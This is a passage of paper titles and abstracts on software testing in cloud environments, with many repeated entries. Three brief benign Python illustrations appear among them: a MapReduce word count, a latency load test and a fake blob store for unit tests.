computing also highlights important aspects of testing that require attention, such as integration and interoperability. This article includes a Web extra that provides additional references for further study. --- paper_title: Application migration to cloud: a taxonomy of critical factors paper_content: Cloud computing has attracted attention as an important platform for software deployment, with perceived benefits such as elasticity to fluctuating load, and reduced operational costs compared to running in enterprise data centers. While some software is written from scratch specially for the cloud, many organizations also wish to migrate existing applications to a cloud platform. Such a migration exercise to a cloud platform is not easy: some changes need to be made to deal with differences in software environment, such as programming model and data storage APIs, as well as varying performance qualities. We report here on experiences in doing a number of sample migrations. We propose a taxonomy of the migration tasks involved, and we show the breakdown of costs among categories of task, for a case-study which migrated a .NET n-tier application to run on Windows Azure. We also indicate important factors that impact on the cost of various migration tasks. This work contributes towards our future direction of building a framework for cost-benefit tradeoff analysis that would apply to migrating applications to cloud platforms, and could help decision-makers evaluate proposals for using cloud computing. --- paper_title: Using realistic simulation for performance analysis of mapreduce setups paper_content: Recently, there has been a huge growth in the amount of data processed by enterprises and the scientific computing community. 
Two promising trends ensure that applications will be able to deal with ever increasing data volumes: First, the emergence of cloud computing, which provides transparent access to a large number of compute, storage and networking resources; and second, the development of the MapReduce programming model, which provides a high-level abstraction for data-intensive computing. However, the design space of these systems has not been explored in detail. Specifically, the impact of various design choices and run-time parameters of a MapReduce system on application performance remains an open question. To this end, we embarked on systematically understanding the performance of MapReduce systems, but soon realized that understanding effects of parameter tweaking in a large-scale setup with many variables was impractical. Consequently, in this paper, we present the design of an accurate MapReduce simulator, MRPerf, for facilitating exploration of MapReduce design space. MRPerf captures various aspects of a MapReduce setup, and uses this information to predict expected application performance. In essence, MRPerf can serve as a design tool for MapReduce infrastructure, and as a planning tool for making MapReduce deployment far easier via reduction in the number of parameters that currently have to be hand-tuned using rules of thumb. Our validation of MRPerf using data from medium-scale production clusters shows that it is able to predict application performance accurately, and thus can be a useful tool in enabling cloud computing. Moreover, an initial application of MRPerf to our test clusters running Hadoop, revealed a performance bottleneck, fixing which resulted in up to 28.05% performance improvement. --- paper_title: Splitter: a proxy-based approach for post-migration testing of web applications paper_content: The benefits of virtualized IT environments, such as compute clouds, have drawn interested enterprises to migrate their applications onto new platforms to gain the advantages of reduced hardware and energy costs, increased flexibility and deployment speed, and reduced management complexity. However, the process of migrating a complex application takes a considerable amount of effort, particularly when performing post-migration testing to verify that the application still functions correctly in the target environment. The traditional approach of test case generation and execution can take weeks and synthetic test cases may not adequately reflect actual application usage. In this paper, we propose and evaluate a black-box approach for post-migration testing of Web applications without manually creating test cases. A Web proxy is put in front of the production application to intercept all requests from real users, and these requests are simultaneously sent to the production and migrated applications. Results generated by both applications are then compared, and mismatches due to migration problems can be easily detected and presented to testing teams for resolution. We implement this approach in Splitter, a software module that is deployed as a reverse Web proxy. Through our evaluation using a number of real applications, we show that it Splitter can effectively automate post-migration testing while also reduce the number of mismatches that must be manually inspected. Equally important, it imposes a relatively small performance overhead on the production environment. 
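For readers unfamiliar with the MapReduce programming model that MRPerf simulates, here is a minimal, self-contained Python word-count sketch using local worker processes. It only illustrates the map and reduce phases; it says nothing about Hadoop's scheduling, data placement, or the configuration parameters MRPerf explores.

```python
from collections import Counter
from functools import reduce
from multiprocessing import Pool

def map_phase(chunk):
    """Map: emit per-chunk word counts."""
    return Counter(chunk.split())

def reduce_phase(left, right):
    """Reduce: merge partial counts into a running total."""
    left.update(right)
    return left

if __name__ == "__main__":
    chunks = [
        "cloud testing in the cloud",
        "testing as a service in the cloud",
        "map reduce testing",
    ]
    with Pool() as pool:
        partials = pool.map(map_phase, chunks)
    totals = reduce(reduce_phase, partials, Counter())
    print(totals.most_common(3))
```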
--- paper_title: Software Testing as an Online Service: Observations from Practice paper_content: The objective of this qualitative study was to explore and understand the conditions that influence software testing as an online service and elicit important research issues. Interviews were conducted with managers from eleven organizations. The study used qualitative grounded theory as its research method. The results indicate that the demand for software testing as an online service is on the rise and is influenced by conditions such as the level of domain knowledge needed to effectively test an application, flexibility and cost effectiveness as benefits, security and pricing as top requirements, cloud computing as the delivery mode and the need for software testers to hone their skills. Potential research areas suggested include application areas best suited for online software testing, pricing and handling of test data among others. --- paper_title: VIAF: Verification-Based Integrity Assurance Framework for MapReduce paper_content: MapReduce, a cloud computing paradigm, is gaining popularity. However, like all open distributed computing frameworks, MapReduce suffers from the integrity assurance vulnerability: it takes merely one malicious worker to render the overall computation result useless. Existing solutions are effective in defeating the malicious behavior of non-collusive workers, but are futile in detecting collusive workers. In this paper, we focus on the mappers, which typically constitute the majority of workers, and propose the Verification-based Integrity Assurance Framework (VIAF) to detect both non-collusive and collusive mappers. The basic idea of VIAF is to combine task replication with non-deterministic verification, in which consistent but malicious results from collusive mappers can be detected by a trusted verifier. We have implemented VIAF in Hadoop, an open source MapReduce implementation. Our theoretical analysis and experimental result show that VIAF can achieve high task accuracy while imposing acceptable overhead. --- paper_title: When to Migrate Software Testing to the Cloud? paper_content: Testing is a challenging activity for many software engineering projects, especially for large-scale systems. The amount of tests cases can range from a few hundred to several thousands, requiring significant computing resources and lengthy execution times. Cloud computing offers the potential to address both of these issues: it offers resources such as virtualized hardware, effectively unlimited storage, and software services that can aid in reducing the execution time of large test suites in a cost-effective manner. However, migrating to the cloud is not without cost, nor is it necessarily the best solution to all testing problems. This paper discusses when to migrate software testing to the cloud from two perspectives: the characteristics of an application under test, and the types of testing performed on the application. --- paper_title: On the Standardization of a Testing Framework for Application Deployment on Grid and Cloud Infrastructures paper_content: An important requirement in the successful deployment of grid and cloud computing technology in industry or governmental institutions is the ability to compose their infrastructures using equipment from different vendors. These equipments have to be engineered for and assessed to assure a problem-free interoperation. 
Focusing on software interoperability, we present a testing framework for the assessment of interoperability of grid and cloud computing infrastructures. This testing framework is part of an initiative for standardizing the use of grid and cloud technology in the context of telecommunication at the European Telecommunications Standards Institute. Following the test development process developed and used at the European Telecommunications Standards Institute, its application is exemplified by the assessment of for resource reservation and application deployment onto grid and cloud infrastructures based on standardized Grid Component Model descriptors. The presented testing framework has been applied successfully in an interoperability event. --- paper_title: Open Cirrus: A Global Cloud Computing Testbed paper_content: Open Cirrus is a cloud computing testbed that, unlike existing alternatives, federates distributed data centers. It aims to spur innovation in systems and applications research and catalyze development of an open source service stack for the cloud. --- paper_title: Towards a scalable and robust multi-tenancy SaaS paper_content: Software-as-as-Service (SaaS) is a new approach for developing software, and it is characterized by its multi-tenancy architecture and its ability to provide flexible customization to individual tenant. However, the multi-tenancy architecture and customization requirements have brought up new issues in software, such as database design, database partition, scalability, recovery, and continuous testing. This paper proposes a hybrid test database design to support SaaS customization with two-layer database partitioning. The database is further extended with a new built-in redundancy with ontology so that the SaaS can recover from ontology, data or meta-data failures. Furthermore, constraints in metadata can be used either as test cases or policies to support SaaS continuous testing and policy enforcement. --- paper_title: Evaluating Cloud Platform Architecture with the CARE Framework paper_content: There is an emergence of Cloud application platforms such as Microsoft’s Azure, Google’s App Engine and Amazon’s EC2/SimpleDB/S3. Startups and Enterprise alike, lured by the promise of ‘infinite scalability’, ‘ease of development’, ‘low infrastructure setup cost’ are increasingly using these Cloud service building blocks to develop and deploy their web based applications. However, the precise nature of these Cloud platforms and the resultant Cloud application runtime behavior is still largely an unknown. Given the black box nature of these platforms, and the novel programming and data models of Cloud, there is a dearth of tools and techniques for enabling the rigorously evaluation of Cloud platforms at runtime. This paper introduces the CARE (Cloud Architecture Runtime Evaluation) approach, a framework for evaluating Cloud application development and runtime platforms. CARE implements a unified interface with WSDL and REST in order to evaluate different Cloud platforms for Cloud application hosting servers and Cloud databases. With the unified interface, we are able to perform selective high stress and low stress evaluations corresponding to desired test scenarios. Result shows the effectiveness of CARE in the evaluation of Cloud variations in terms of scalability, availability and responsiveness, across both compute and storage capabilities. Thus placing CARE as an important tool in the path of Cloud computing research. 
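In the spirit of CARE-style runtime evaluation, the sketch below issues the same request at increasing concurrency levels and reports latency statistics. The target URL is hypothetical and the harness is far simpler than CARE's unified WSDL/REST interface, but it shows how low-stress and high-stress runs against a cloud-hosted service can be compared for responsiveness.

```python
import statistics
import time
import urllib.request
from concurrent.futures import ThreadPoolExecutor

TARGET = "http://service-under-test.example.com/api/ping"  # hypothetical endpoint

def timed_request(_):
    """Issue one request and return (success flag, latency in seconds)."""
    start = time.perf_counter()
    try:
        with urllib.request.urlopen(TARGET, timeout=10) as resp:
            resp.read()
            ok = resp.status == 200
    except OSError:
        ok = False
    return ok, time.perf_counter() - start

def run_load(concurrency, total_requests):
    """Fire requests at a fixed concurrency level and summarize latency."""
    with ThreadPoolExecutor(max_workers=concurrency) as pool:
        results = list(pool.map(timed_request, range(total_requests)))
    latencies = sorted(lat for ok, lat in results if ok)
    failures = sum(1 for ok, _ in results if not ok)
    if not latencies:
        print(f"concurrency={concurrency}: all {failures} requests failed")
        return
    p95 = latencies[int(0.95 * len(latencies)) - 1]
    print(f"concurrency={concurrency} failures={failures} "
          f"median={statistics.median(latencies):.3f}s p95={p95:.3f}s")

if __name__ == "__main__":
    for level in (1, 10, 50):   # low-stress vs. high-stress runs
        run_load(level, total_requests=200)
```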
--- paper_title: Risk-Based Security Testing in Cloud Computing Environments paper_content: Assuring the security of a software system in terms of testing nowadays still is a quite tricky task to conduct. Security requirements are taken as a foundation to derive tests to be executed against a system under test. Yet, these positive requirements by far do not cover all the relevant security aspects to be considered. Hence, especially in the event of security testing, negative requirements, derived from risk analysis, are vital to be incorporated. If considering today's emerging trend in the adoption of cloud computing, security testing even has a more important significance. Due to a cloud's openness, in theory there exists an infinite number of tests. Hence, a concise technique to incorporate the results of risk analysis in security testing is inevitable. We therefore propose a new model-driven methodology for the security testing of cloud environments, ingesting misuse cases, defined by negative requirements derived from risk analysis. --- paper_title: Cloud9: a software testing service paper_content: Cloud9 aims to reduce the resource-intensive and laborintensive nature of high-quality software testing. First, Cloud9 parallelizes symbolic execution (an effective, but still poorly scalable test automation technique) to large shared-nothing clusters. To our knowledge, Cloud9 is the first symbolic execution engine that scales to large clusters of machines, thus enabling thorough automated testing of real software in conveniently short amounts of time. Preliminary results indicate one to two orders of magnitude speedup over a state-of-the-art symbolic execution engine. Second, Cloud9 is an on-demand software testing service: it runs on compute clouds, like Amazon EC2, and scales its use of resources over a wide dynamic range, proportionally with the testing task at hand. --- paper_title: An environment for evaluation and testing of service workflow schedulers in clouds paper_content: Workflows built through service composition bring new challenges, making the scheduling task even more complex. Besides that, scheduling researchers need a wide range of workflows and their respective services to validate new achievements. In this paper we present a service oriented testbed where experiments can be conducted to develop and evaluate algorithms, heuristics, and scheduling policies for workflows. Our testbed offers an emulator service which allows the workflow characterization through the description of its services. With this, researchers can build workflows which have similar behavior to the real workflow applications, emulating them without the need of implementing all applications and services involved in a real application execution. To demonstrate the utilization of both the testbed and emulator, we conducted workflow executions emulating service workflow applications, such as Montage and LIGO. --- paper_title: An Approach for Service Composition and Testing for Cloud Computing paper_content: As cloud services proliferate, it becomes difficult to facilitate service composition and testing in clouds. In traditional service-oriented computing, service composition and testing are carried out independently. This paper proposes a new approach to manage services on the cloud so that it can facilitate service composition and testing. 
The paper uses service implementation selection to facilitate service composition similar to Google’s Guice and Spring tools, and apply the group testing technique to identify the oracle, and use the established oracle to perform continuous testing for new services or compositions. The paper extends the existing concept of template based service composition and focus on testing the same workflow of service composition. In addition, all these testing processes can be executed in parallel, and the paper illustrates how to apply service-level MapReduce technique to accelerate the testing process. --- paper_title: Application-Oriented Remote Verification Trust Model in Cloud Computing paper_content: The emergence and application of cloud computing can help users access to various computing resources and services more conveniently. However, it also brings forth many security challenges. This paper proposes the application oriented remote verification trust model, which is capable of adjusting the useri¯s trust authorization verification contents according to the specific security requirements of different applications. The model also dynamically adjusts the usersi¯trust value with the trust feedback mechanism to determine whether or not the requested resource or service should be provided, so as to guarantee the security of information resources. This paper provides a formal description of the basic components and trust properties of the model with a belief formula, and describes the framework for the implementation of the model. --- paper_title: Large-Scale Software Testing Environment Using Cloud Computing Technology for Dependable Parallel and Distributed Systems paper_content: Various information systems are widely used in information society era, and the demand for highly dependable system is increasing year after year. However, software testing for such a system becomes more difficult due to the enlargement and the complexity of the system. In particular, it is too difficult to test parallel and distributed systems sufficiently although dependable systems such as high-availability servers usually form parallel and distributed systems. To solve these problems, we proposed a software testing environment for dependable parallel and distributed system using the cloud computing technology, named D-Cloud. D-Cloud includes Eucalyptus as the cloud management software, and FaultVM based on QEMU as the virtualization software, and D-Cloud frontend for interpreting test scenario. D-Cloud enables not only to automate the system configuration and the test procedure but also to perform a number of test cases simultaneously, and to emulate hardware faults flexibly. In this paper, we present the concept and design of D-Cloud, and describe how to specify the system configuration and the test scenario. Furthermore, the preliminary test example as the software testing using D-Cloud was presented. Its result shows that D-Cloud allows to set up the environment easily, and to test the software testing for the distributed system. --- paper_title: Cloud Services Testing: An Understanding paper_content: There is a mammoth quantity of Cloud Services being deployed on the Cloud, nowadays. Everyday users and customers use these services to fulfil their needs. The use of Cloud Services is getting more and more complex with the pace of time. It is a possibility that several recurrent service requests cannot be fulfilled using just one Cloud service. 
Cloud services are usually composed manually, which is a time consuming and monotonous task. We can find several numbers of successful methods for automatic Cloud service composition, the main issue with that is the lack of test environment with some standards to compare and evaluate these methods. This research work is about a short survey to explore Cloud Services testing methods. This study compares several software testing researches and pose questions for further research work to find Cloud suited testing techniques for the software testers. This survey paper poses few questions to the Cloud computing research community to concentrate and find suited answers for software testing community. --- paper_title: Parallel symbolic execution for structural test generation paper_content: Symbolic execution is a popular technique for automatically generating test cases achieving high structural coverage. Symbolic execution suffers from scalability issues since the number of symbolic paths that need to be explored is very large (or even infinite) for most realistic programs. To address this problem, we propose a technique, Simple Static Partitioning, for parallelizing symbolic execution. The technique uses a set of pre-conditions to partition the symbolic execution tree, allowing us to effectively distribute symbolic execution and decrease the time needed to explore the symbolic execution tree. The proposed technique requires little communication between parallel instances and is designed to work with a variety of architectures, ranging from fast multi-core machines to cloud or grid computing environments. We implement our technique in the Java PathFinder verification tool-set and evaluate it on six case studies with respect to the performance improvement when exploring a finite symbolic execution tree and performing automatic test generation. We demonstrate speedup in both the analysis time over finite symbolic execution trees and in the time required to generate tests relative to sequential execution, with a maximum analysis time speedup of 90x observed using 128 workers and a maximum test generation speedup of 70x observed using 64 workers. --- paper_title: VATS: Virtualized-Aware Automated Test Service paper_content: It is anticipated that by 2015 more than 75% of Information Technology infrastructure will be purchased as a service from service providers. Services will be hosted in virtualized shared resource pools referred to as Clouds. Service providers will need to ensure that customer performance requirements are satisfied while consuming an acceptable quantity of resources. This paper describes a Virtualization-aware Automated Testing Service (VATS). VATS is a framework for automated test execution in Cloud computing environments. It executes tests, manipulates virtualized infrastructure, and collects performance information. VATS uses HP LoadRunner as a load generator and provides the foundation for an automatic performance evaluator for Cloud environments. A case study describes our use of VATS with an SAP R/3 system running in a Xen-based virtualized resource pool. The results from VATS are used to determine the impact of virtual machine configuration parameters on a SAP system. --- paper_title: Leveraging Cloud Platform for Custom Application Development paper_content: Compared with packaged application, custom application developments (CAD) experience the frustration of higher project overhead and less certainty. 
The typical time spent on building the infrastructure for a CAD project is, on average, several weeks. Project uncertainty comes from unique customer requirements and lack of standardized methods and toolsets to follow. Therefore, a CAD project is more difficult to achieve cost reduction and asset reuse. In this paper, we present a cloud platform to alleviate this problem through an integration of a) standard methods, b) standardized toolsets aligned with those methods, c) project management environments with pre-defined work breakdown structure (WBS) aligned with those methods and toolsets, and d) infrastructure support from the cloud technology. We believe that such a cloud platform will become a fundamental approach for large enterprises to develop CAD or other solutions for their clients. --- paper_title: Environment Modeling for Automated Testing of Cloud Applications paper_content: Recently, cloud computing platforms, such as Microsoft Azure, are available to provide convenient infrastructures such that cloud applications could conduct cloud and data-intensive computing. To ensure high quality of cloud applications under development, developer testing (also referred to as unit testing) could be used. The behavior of a unit in a cloud application is dependent on the test inputs as well as the state of the cloud environment. Generally, manually providing various test inputs and cloud states for conducting developer testing is time-consuming and labor-intensive. To reduce the manual effort, developers could employ automated test generation tools. However, applying an automated test generation tool faces the challenge of generating various cloud states for achieving effective testing, such as achieving high structural coverage of the cloud application since these tools cannot control the cloud environment. To address this challenge, we propose an approach to (1) model the cloud environment for simulating the behavior of the real environment and, (2) apply Dynamic Symbolic Execution (DSE), to both generate test inputs and cloud states to achieve high structural coverage. We apply our approach on some open source Azure cloud applications. The result shows that our approach automatically generates test inputs and cloud states to achieve high structural coverage of the cloud application. --- paper_title: Automated software testing as a service paper_content: This paper makes the case for TaaS--automated software testing as a cloud-based service. We present three kinds of TaaS: a "programmer's sidekick" enabling developers to thoroughly and promptly test their code with minimal upfront resource investment; a "home edition" on-demand testing service for consumers to verify the software they are about to install on their PC or mobile device; and a public "certification service," akin to Underwriters Labs, that independently assesses the reliability, safety, and security of software. TaaS automatically tests software, without human involvement from the service user's or provider's side. This is unlike today's "testing as a service" businesses, which employ humans to write tests. Our goal is to take recently proposed techniques for automated testing--even if usable only on to y programs--and make them practical by modifying them to harness the resources of compute clouds. Preliminary work suggests it is technically feasible to do so, and we find that TaaS is also compelling from a social and business point of view. 
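To make the environment-modeling idea in the preceding abstract concrete, the sketch below shows how a unit under test whose behavior depends on cloud state can be exercised against a hand-rolled in-memory fake of a blob store. This is an illustrative, assumption-laden sketch rather than code from the cited work: the cited approach targets Microsoft Azure and uses dynamic symbolic execution to generate cloud states automatically, whereas here the two states (blob absent, blob present) are written by hand, and the names FakeBlobStore and process_order are hypothetical.

```python
# Illustrative sketch only: an in-memory fake of a cloud blob container used to
# drive a unit under test through both of its branches without a real cloud
# account. FakeBlobStore and process_order are hypothetical names, not APIs
# from the cited papers, which target Azure and dynamic symbolic execution.

class FakeBlobStore:
    """Minimal in-memory stand-in for a cloud blob container."""
    def __init__(self, blobs=None):
        self._blobs = dict(blobs or {})

    def exists(self, name):
        return name in self._blobs

    def download(self, name):
        if name not in self._blobs:
            raise KeyError(f"blob not found: {name}")
        return self._blobs[name]

    def upload(self, name, data):
        self._blobs[name] = data


def process_order(store, order_id):
    """Unit under test: its behavior depends on the cloud state (blob present or not)."""
    name = f"orders/{order_id}.json"
    if not store.exists(name):        # branch 1: missing cloud state
        store.upload(name, b"{}")
        return "created"
    return f"loaded {len(store.download(name))} bytes"   # branch 2: existing state


if __name__ == "__main__":
    # Two hand-chosen "cloud states" that together cover both branches.
    assert process_order(FakeBlobStore(), 1) == "created"
    assert process_order(FakeBlobStore({"orders/2.json": b'{"total": 3}'}), 2).startswith("loaded")
    print("both cloud-state branches exercised")
```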
--- paper_title: Research Issues for Software Testing in the Cloud paper_content: Cloud computing is causing a paradigm shift in the provision and use of computing services, away from the traditional desktop form to online services. This implies that the manner in which these computing services are tested should also change. This paper discusses the research issues that cloud computing imposes on software testing. These issues were gathered during interviews with industry practitioners from eleven software organizations. The interviews were analyzed using qualitative grounded theory method. Findings of the study were compared with existing literature. The research issues were categorized according to application, management, legal and financial issues. By addressing these issues, researchers can offer reliable recommendation for practitioners in the industry. --- paper_title: Software Testing as an Online Service: Observations from Practice paper_content: The objective of this qualitative study was to explore and understand the conditions that influence software testing as an online service and elicit important research issues. Interviews were conducted with managers from eleven organizations. The study used qualitative grounded theory as its research method. The results indicate that the demand for software testing as an online service is on the rise and is influenced by conditions such as the level of domain knowledge needed to effectively test an application, flexibility and cost effectiveness as benefits, security and pricing as top requirements, cloud computing as the delivery mode and the need for software testers to hone their skills. Potential research areas suggested include application areas best suited for online software testing, pricing and handling of test data among others. --- paper_title: Software Engineering Challenges for Migration to the Service Cloud Paradigm: Ongoing Work in the REMICS Project paper_content: This paper presents on-going work in a research project on defining methodology and tools for model-driven migration of legacy applications to a service-oriented architecture with deployment in the cloud, i.e. the Service Cloud paradigm. We have performed a comprehensive state of the art analysis and present some findings here. In parallel, the two industrial participants in the project have specified their requirements and expectations regarding modernization of their applications. The SOA paradigm implies the breakdown of architecture into high-grain components providing business services. For taking advantage of the services of cloud computing technologies, the clients' architecture should be decomposed, decoupled and be made scalable. Also requirements regarding servers, data storage and security, networking and response time, business models and pricing should be projected. We present software engineering challenges related to these aspects and examples of these in the context of one of the industrial cases in the project. --- paper_title: Application migration to cloud: a taxonomy of critical factors paper_content: Cloud computing has attracted attention as an important platform for software deployment, with perceived benefits such as elasticity to fluctuating load, and reduced operational costs compared to running in enterprise data centers. While some software is written from scratch specially for the cloud, many organizations also wish to migrate existing applications to a cloud platform. 
Such a migration exercise to a cloud platform is not easy: some changes need to be made to deal with differences in software environment, such as programming model and data storage APIs, as well as varying performance qualities. We report here on experiences in doing a number of sample migrations. We propose a taxonomy of the migration tasks involved, and we show the breakdown of costs among categories of task, for a case-study which migrated a .NET n-tier application to run on Windows Azure. We also indicate important factors that impact on the cost of various migration tasks. This work contributes towards our future direction of building a framework for cost-benefit tradeoff analysis that would apply to migrating applications to cloud platforms, and could help decision-makers evaluate proposals for using cloud computing. --- paper_title: Using realistic simulation for performance analysis of mapreduce setups paper_content: Recently, there has been a huge growth in the amount of data processed by enterprises and the scientific computing community. Two promising trends ensure that applications will be able to deal with ever increasing data volumes: First, the emergence of cloud computing, which provides transparent access to a large number of compute, storage and networking resources; and second, the development of the MapReduce programming model, which provides a high-level abstraction for data-intensive computing. However, the design space of these systems has not been explored in detail. Specifically, the impact of various design choices and run-time parameters of a MapReduce system on application performance remains an open question. To this end, we embarked on systematically understanding the performance of MapReduce systems, but soon realized that understanding effects of parameter tweaking in a large-scale setup with many variables was impractical. Consequently, in this paper, we present the design of an accurate MapReduce simulator, MRPerf, for facilitating exploration of MapReduce design space. MRPerf captures various aspects of a MapReduce setup, and uses this information to predict expected application performance. In essence, MRPerf can serve as a design tool for MapReduce infrastructure, and as a planning tool for making MapReduce deployment far easier via reduction in the number of parameters that currently have to be hand-tuned using rules of thumb. Our validation of MRPerf using data from medium-scale production clusters shows that it is able to predict application performance accurately, and thus can be a useful tool in enabling cloud computing. Moreover, an initial application of MRPerf to our test clusters running Hadoop, revealed a performance bottleneck, fixing which resulted in up to 28.05% performance improvement. --- paper_title: Splitter: a proxy-based approach for post-migration testing of web applications paper_content: The benefits of virtualized IT environments, such as compute clouds, have drawn interested enterprises to migrate their applications onto new platforms to gain the advantages of reduced hardware and energy costs, increased flexibility and deployment speed, and reduced management complexity. However, the process of migrating a complex application takes a considerable amount of effort, particularly when performing post-migration testing to verify that the application still functions correctly in the target environment. 
The traditional approach of test case generation and execution can take weeks, and synthetic test cases may not adequately reflect actual application usage. In this paper, we propose and evaluate a black-box approach for post-migration testing of Web applications without manually creating test cases. A Web proxy is put in front of the production application to intercept all requests from real users, and these requests are simultaneously sent to the production and migrated applications. Results generated by both applications are then compared, and mismatches due to migration problems can be easily detected and presented to testing teams for resolution. We implement this approach in Splitter, a software module that is deployed as a reverse Web proxy. Through our evaluation using a number of real applications, we show that Splitter can effectively automate post-migration testing while also reducing the number of mismatches that must be manually inspected. Equally important, it imposes a relatively small performance overhead on the production environment. --- paper_title: Software Testing as an Online Service: Observations from Practice paper_content: The objective of this qualitative study was to explore and understand the conditions that influence software testing as an online service and elicit important research issues. Interviews were conducted with managers from eleven organizations. The study used qualitative grounded theory as its research method. The results indicate that the demand for software testing as an online service is on the rise and is influenced by conditions such as the level of domain knowledge needed to effectively test an application, flexibility and cost effectiveness as benefits, security and pricing as top requirements, cloud computing as the delivery mode and the need for software testers to hone their skills. Potential research areas suggested include application areas best suited for online software testing, pricing and handling of test data among others. --- paper_title: When to Migrate Software Testing to the Cloud? paper_content: Testing is a challenging activity for many software engineering projects, especially for large-scale systems. The number of test cases can range from a few hundred to several thousand, requiring significant computing resources and lengthy execution times. Cloud computing offers the potential to address both of these issues: it offers resources such as virtualized hardware, effectively unlimited storage, and software services that can aid in reducing the execution time of large test suites in a cost-effective manner. However, migrating to the cloud is not without cost, nor is it necessarily the best solution to all testing problems. This paper discusses when to migrate software testing to the cloud from two perspectives: the characteristics of an application under test, and the types of testing performed on the application. --- paper_title: Towards a scalable and robust multi-tenancy SaaS paper_content: Software-as-a-Service (SaaS) is a new approach for developing software, and it is characterized by its multi-tenancy architecture and its ability to provide flexible customization to individual tenants. However, the multi-tenancy architecture and customization requirements have brought up new issues in software, such as database design, database partition, scalability, recovery, and continuous testing. This paper proposes a hybrid test database design to support SaaS customization with two-layer database partitioning.
The database is further extended with a new built-in redundancy with ontology so that the SaaS can recover from ontology, data or meta-data failures. Furthermore, constraints in metadata can be used either as test cases or policies to support SaaS continuous testing and policy enforcement. --- paper_title: Evaluating Cloud Platform Architecture with the CARE Framework paper_content: There is an emergence of Cloud application platforms such as Microsoft’s Azure, Google’s App Engine and Amazon’s EC2/SimpleDB/S3. Startups and Enterprise alike, lured by the promise of ‘infinite scalability’, ‘ease of development’, ‘low infrastructure setup cost’ are increasingly using these Cloud service building blocks to develop and deploy their web based applications. However, the precise nature of these Cloud platforms and the resultant Cloud application runtime behavior is still largely an unknown. Given the black box nature of these platforms, and the novel programming and data models of Cloud, there is a dearth of tools and techniques for enabling the rigorously evaluation of Cloud platforms at runtime. This paper introduces the CARE (Cloud Architecture Runtime Evaluation) approach, a framework for evaluating Cloud application development and runtime platforms. CARE implements a unified interface with WSDL and REST in order to evaluate different Cloud platforms for Cloud application hosting servers and Cloud databases. With the unified interface, we are able to perform selective high stress and low stress evaluations corresponding to desired test scenarios. Result shows the effectiveness of CARE in the evaluation of Cloud variations in terms of scalability, availability and responsiveness, across both compute and storage capabilities. Thus placing CARE as an important tool in the path of Cloud computing research. --- paper_title: An environment for evaluation and testing of service workflow schedulers in clouds paper_content: Workflows built through service composition bring new challenges, making the scheduling task even more complex. Besides that, scheduling researchers need a wide range of workflows and their respective services to validate new achievements. In this paper we present a service oriented testbed where experiments can be conducted to develop and evaluate algorithms, heuristics, and scheduling policies for workflows. Our testbed offers an emulator service which allows the workflow characterization through the description of its services. With this, researchers can build workflows which have similar behavior to the real workflow applications, emulating them without the need of implementing all applications and services involved in a real application execution. To demonstrate the utilization of both the testbed and emulator, we conducted workflow executions emulating service workflow applications, such as Montage and LIGO. --- paper_title: An Approach for Service Composition and Testing for Cloud Computing paper_content: As cloud services proliferate, it becomes difficult to facilitate service composition and testing in clouds. In traditional service-oriented computing, service composition and testing are carried out independently. This paper proposes a new approach to manage services on the cloud so that it can facilitate service composition and testing. 
The paper uses service implementation selection to facilitate service composition similar to Google’s Guice and Spring tools, and apply the group testing technique to identify the oracle, and use the established oracle to perform continuous testing for new services or compositions. The paper extends the existing concept of template based service composition and focus on testing the same workflow of service composition. In addition, all these testing processes can be executed in parallel, and the paper illustrates how to apply service-level MapReduce technique to accelerate the testing process. --- paper_title: YETI on the Cloud paper_content: The York Extensible Testing Infrastructure (YETI) is an automated random testing tool that allows to test programs written in various programming languages. While YETI is one of the fastest random testing tools with over a million method calls per minute on fast code, testing large programs or slow code -- such as libraries using intensively the memory -- might benefit from parallel executions of testing sessions. This paper presents the cloud-enabled version of YETI. It relies on the Hadoop package and its map/reduce implementation to distribute tasks over potentially many computers. This would allow to distribute the cloud version of YETI over Amazon's Elastic Compute Cloud (EC2). --- paper_title: Parallel symbolic execution for structural test generation paper_content: Symbolic execution is a popular technique for automatically generating test cases achieving high structural coverage. Symbolic execution suffers from scalability issues since the number of symbolic paths that need to be explored is very large (or even infinite) for most realistic programs. To address this problem, we propose a technique, Simple Static Partitioning, for parallelizing symbolic execution. The technique uses a set of pre-conditions to partition the symbolic execution tree, allowing us to effectively distribute symbolic execution and decrease the time needed to explore the symbolic execution tree. The proposed technique requires little communication between parallel instances and is designed to work with a variety of architectures, ranging from fast multi-core machines to cloud or grid computing environments. We implement our technique in the Java PathFinder verification tool-set and evaluate it on six case studies with respect to the performance improvement when exploring a finite symbolic execution tree and performing automatic test generation. We demonstrate speedup in both the analysis time over finite symbolic execution trees and in the time required to generate tests relative to sequential execution, with a maximum analysis time speedup of 90x observed using 128 workers and a maximum test generation speedup of 70x observed using 64 workers. --- paper_title: VATS: Virtualized-Aware Automated Test Service paper_content: It is anticipated that by 2015 more than 75% of Information Technology infrastructure will be purchased as a service from service providers. Services will be hosted in virtualized shared resource pools referred to as Clouds. Service providers will need to ensure that customer performance requirements are satisfied while consuming an acceptable quantity of resources. This paper describes a Virtualization-aware Automated Testing Service (VATS). VATS is a framework for automated test execution in Cloud computing environments. It executes tests, manipulates virtualized infrastructure, and collects performance information. 
VATS uses HP LoadRunner as a load generator and provides the foundation for an automatic performance evaluator for Cloud environments. A case study describes our use of VATS with an SAP R/3 system running in a Xen-based virtualized resource pool. The results from VATS are used to determine the impact of virtual machine configuration parameters on a SAP system. --- paper_title: Leveraging Cloud Platform for Custom Application Development paper_content: Compared with packaged application, custom application developments (CAD) experience the frustration of higher project overhead and less certainty. The typical time spent on building the infrastructure for a CAD project is, on average, several weeks. Project uncertainty comes from unique customer requirements and lack of standardized methods and toolsets to follow. Therefore, a CAD project is more difficult to achieve cost reduction and asset reuse. In this paper, we present a cloud platform to alleviate this problem through an integration of a) standard methods, b) standardized toolsets aligned with those methods, c) project management environments with pre-defined work breakdown structure (WBS) aligned with those methods and toolsets, and d) infrastructure support from the cloud technology. We believe that such a cloud platform will become a fundamental approach for large enterprises to develop CAD or other solutions for their clients. --- paper_title: Environment Modeling for Automated Testing of Cloud Applications paper_content: Recently, cloud computing platforms, such as Microsoft Azure, are available to provide convenient infrastructures such that cloud applications could conduct cloud and data-intensive computing. To ensure high quality of cloud applications under development, developer testing (also referred to as unit testing) could be used. The behavior of a unit in a cloud application is dependent on the test inputs as well as the state of the cloud environment. Generally, manually providing various test inputs and cloud states for conducting developer testing is time-consuming and labor-intensive. To reduce the manual effort, developers could employ automated test generation tools. However, applying an automated test generation tool faces the challenge of generating various cloud states for achieving effective testing, such as achieving high structural coverage of the cloud application since these tools cannot control the cloud environment. To address this challenge, we propose an approach to (1) model the cloud environment for simulating the behavior of the real environment and, (2) 